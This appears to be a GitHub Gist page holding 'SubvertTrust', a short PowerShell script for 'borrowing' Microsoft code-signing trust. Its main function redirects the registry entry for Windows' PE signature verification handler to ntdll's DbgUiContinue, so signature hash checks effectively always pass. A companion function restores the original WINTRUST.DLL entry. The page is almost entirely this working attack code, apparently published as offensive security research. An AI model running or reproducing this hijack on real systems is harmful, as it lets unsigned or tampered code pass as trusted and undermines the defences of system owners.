Instantly share code, notes, and snippets.

Embed
What would you like to do?
Borrowing Microsoft Code Signing Certificates
<#
SubvertTrust v1.0
License: GPLv3
Author: @ConsciousHacker
Credits: @mattifestation
#>
function SubvertTrust
{
$VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
# PE SIP Guids
#{C689AAB9-8E78-11D0-8C47-00C04FC295EE}
#{C689AABA-8E78-11D0-8C47-00C04FC295EE}
$PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'
$PESignatureVerifier = Get-Item -Path "$VerifyHashFunc\$PESIPGuid\"
# Signed code reuse attack that will effectively return TRUE when the
# digitial signature hash validation function is called.
$NewDll = 'C:\Windows\System32\ntdll.dll'
$NewFuncName = 'DbgUiContinue'
$PESignatureVerifier | Set-ItemProperty -Name Dll -Value $NewDll
$PESignatureVerifier | Set-ItemProperty -Name FuncName -Value $NewFuncName
}
function RevertTrust
{
$VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
# PE SIP Guids
#{C689AAB9-8E78-11D0-8C47-00C04FC295EE}
#{C689AABA-8E78-11D0-8C47-00C04FC295EE}
$PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'
$PESignatureVerifier = Get-Item -Path "$VerifyHashFunc\$PESIPGuid\"
# Signed code reuse attack that will effectively return TRUE when the
# digitial signature hash validation function is called.
$NewDll = 'WINTRUST.DLL'
$NewFuncName = 'CryptSIPVerifyIndirectData'
$PESignatureVerifier | Set-ItemProperty -Name Dll -Value $NewDll
$PESignatureVerifier | Set-ItemProperty -Name FuncName -Value $NewFuncName
}
##################
# Start a new process for the hijack to take effect.
# powershell
##################
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment